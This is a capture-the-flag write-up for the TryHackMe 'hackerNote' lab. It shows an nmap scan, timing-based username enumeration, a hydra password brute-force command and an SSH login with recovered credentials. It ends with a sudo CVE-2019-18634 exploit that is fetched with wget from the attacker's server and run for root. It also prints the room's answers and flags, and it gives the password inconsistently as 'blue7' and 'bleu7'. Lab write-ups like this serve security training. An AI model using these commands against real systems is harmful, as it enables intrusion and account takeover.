A custom webapp, introducing username enumeration, custom wordlists and a basic privilege escalation exploit.
THM Room https://tryhackme.com/room/hackernote
TASK 1 : Reconnaissance
Which ports are open? (in numerical order)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
root@ip-10-10-127-246:~# nmap -sC -vv 10.10.127.143
[...]
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
| ssh-hostkey:
| 2048 10:a6:95:34:62:b0:56:2a:38:15:77:58:f4:f3:6c:ac (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0njoI1MTN18O8+mhh7M4EpPVA2+5B3OsOtfyhpjYadmUYmS1LgxRSCAyUNFP3iKM7vmqbC9KalD6hUSWmorDoPCzgTuLPf6784OURkFZeZMmC3Cw3Qmdu348Vf2kvM0EAXJmcZG3Y6fspIsNgye6eZkVNHZ1m4qyvJ+/b6WLD0fqA1yQgKhvLKqIAedsni0Qs8HtJDkAIvySCigaqGJVONPbXc2/z2g5io+Tv3/wC/2YTNzP5DyDYI9wL2k2A9dAeaaG51z6z02l6F1zGzFwiwrFP+fopEjhQUa99f3saIgoq3aPOJ/QufS1SiZc6AqeD8RJ/6HWz10timm5A+n4J
| 256 6f:18:27:a4:e7:21:9d:4e:6d:55:b3:ac:c5:2d:d5:d3 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHKcOFLvSTrwsitMygOlMRDEZIfujX3UEXx9cLfrmkYnn0dHtHsmkcUUMc1YrwaZlDeORnJE5Z/NAH70GaidO2s=
| 256 2d:c3:1b:58:4d:c3:5d:8e:6a:f6:37:9d:ca:ad:20:7c (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGFFNuuI7oo+OdJaPnUbVa1hN/rtLQalzQ1vkgWKsF9z
80/tcp open http syn-ack ttl 64
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - hackerNote
8080/tcp open http-proxy syn-ack ttl 64
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Home - hackerNote
[...]
Answer : 22,80,8080
What programming language is the backend written in ?
1
2
3
4
5
6
7
8
9
10
11
12
13
root@ip-10-10-127-246:~# nmap -sV -sC -vv 10.10.127.143
[...]
80/tcp open http syn-ack ttl 64 Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - hackerNote
8080/tcp open http syn-ack ttl 64 Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Home - hackerNote
[...]
Answer : go
TASK 2 : Investigate
Create your own user account
No answer : created user john and password 12345 with hint 12345
Log in to your account
No answer
Try and log in to an invalid user account
No answer
Try and log in to your account, with an incorrect password.
No answer. Delay before error
Notice the timing difference. This allows user enumeration
No answer. Wrong username is returning “invalid username or password” immediately and clicking “i forgot my password” with a valid username show the hint for this usernme.
TASK 3 : Exploit
Try to write a script to perform a timing attack.
No answer. Download script from https://raw.githubusercontent.com/NinjaJc01/hackerNoteExploits/master/exploit.py
How many usernames from the list are valid ?
Run the script downloaded.
Answer : 1
What are/is the valid username(s) ?
Answer : james
TASK 4 : Attack Passwords
Form the hydra command to attack the login API route
1
hydra -l james -P wordlist.txt 10.10.127.143 http-post-form "/api/user/login:username=^USER^&password=^PASS^:F=incorrect" -V
How many passwords were in your wordlist?
Form the wordlist.txt from known favorites color and number (hint from james “forgotten password”) with HASHCAT-UTILS and the two files numbers.txt and colors.txt :
1
2
3
4
5
6
cp numbers.txt /opt/hashcat-utils/src
cp colors.txt /opt/hashcat-utils/src
cd /opt/hashcat-utils/src
./combinator.bin colors.txt numbers.txt > wordlist.txt
wc wordlist.txt
180
Answer : 180
What was the user’s password?
I do a cluster bomb attack with BURPSUITE and the wordlist.txt and i get the result blue7 password match with a different length.
Answer : bleu7
Login as the user to the platform
No answer but James let us a note as reminder with his SSH password : dak4ddb37b
What’s the user’s SSH password?
Answer : dak4ddb37b
Log in as the user to SSH with the credentials you have.
1
ssh james@10.10.127.143
No answer
What’s the user flag?
1
2
cat user.txt
thm{56911bd7ba1371a3221478aa5c094d68}
Answer :thm{56911bd7ba1371a3221478aa5c094d68}
TASK 5 : Escalate
What is the CVE number for the exploit?
Reading the texttell us the recent CVE is “pwdfeedback” and googling”pwdfeedback” return theCVE-2019-18634.
Answer :CVE-2019-18634
Find the exploit from https://github.com/saleemrashid/ and download the files.
1
2
3
4
cd Deskstop
mkdir cve-2019-18634
cd cve-2019-18634
git clone https://github.com/saleemrashid/sudo-cve-2019-18634
No answer
Compile the exploit from Kali linux.
1
2
cd sudo-cve-2019-18634
make
No answer
SCP the exploit binary to the box.
Copy and save this code to the KALI where you downloaded the exploit :
1
2
3
4
5
6
7
import http.server
import socketserver
PORT = 8888
Handler = http.server.SimpleHTTPRequestHandler
with socketserver.TCPServer(("", PORT), Handler) as http:
print("serving at port", PORT)
http.serve_forever()
Run the above code :
1
python server.py
No answer
Run the exploit, get root.
On the SSH of James :
1
2
3
4
5
6
cd /tmp
wget 10.10.127.246:8888/exploit
chmod +x exploit
./exploit
id
uid=0(root)
No Answer
What is the root flag?
1
2
cat /root/root.txt
thm{af55ada6c2445446eb0606b5a2d3a4d2}
Answer : thm{af55ada6c2445446eb0606b5a2d3a4d2}